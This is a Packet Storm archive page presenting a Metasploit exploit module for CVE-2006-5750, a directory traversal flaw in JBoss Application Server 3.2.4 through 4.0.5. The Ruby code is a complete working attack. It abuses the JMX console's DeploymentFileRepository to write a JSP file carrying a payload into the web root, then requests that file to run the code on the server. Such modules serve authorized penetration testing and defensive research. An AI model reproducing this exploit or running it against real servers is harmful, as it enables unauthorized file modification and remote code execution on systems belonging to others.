what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

JBoss Java Class DeploymentFileRepository Directory Traversal

JBoss Java Class DeploymentFileRepository Directory Traversal
Posted May 8, 2010
Authored by MC | Site metasploit.com

This Metasploit module exploits a directory traversal vulnerability in the DeploymentFileRepository class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability allows remote authenticated (and unauthenticated) users to read or modify arbitrary files, and possibly execute arbitrary code.

tags | exploit, remote, arbitrary
advisories | CVE-2006-5750
SHA-256 | 8a9a09e9e3e11dbba365dfd0b4f80d5ef2cf90d92cc0ca65b1ee490fcc113646

JBoss Java Class DeploymentFileRepository Directory Traversal

Change Mirror Download
##
# $Id: jboss_deploymentfilerepository.rb 9246 2010-05-07 22:28:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the DeploymentFileRepository
class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability
allows remote authenticated (and unathenticated) users to read or modify arbitrary files,
and possibly execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9246 $',
'References' =>
[
[ 'CVE', '2006-5750' ],
[ 'BID', '21219' ]
],
'Privileged' => false,
'Platform' => [ 'linux' ],
'Targets' =>
[
[ 'Universal',
{
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true,
},
}
],
],
'DisclosureDate' => 'Nov 27 2006',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(8080),
OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']),
OptString.new('URI', [ true, "The system shell to use.", '/jmx-console/']),
OptString.new('PATH', [ true, "The URI path of the console.", '../jmx-console.war/'])
], self.class)
end

def exploit

fname = rand_text_alpha_upper(rand(5) + 1)

res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST',
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
})

if (res.code == 200)
print_status("Triggering payload...")
send_request_raw(
{
'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET',
})
else
print_error("Denied...")
end

handler
end

end
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close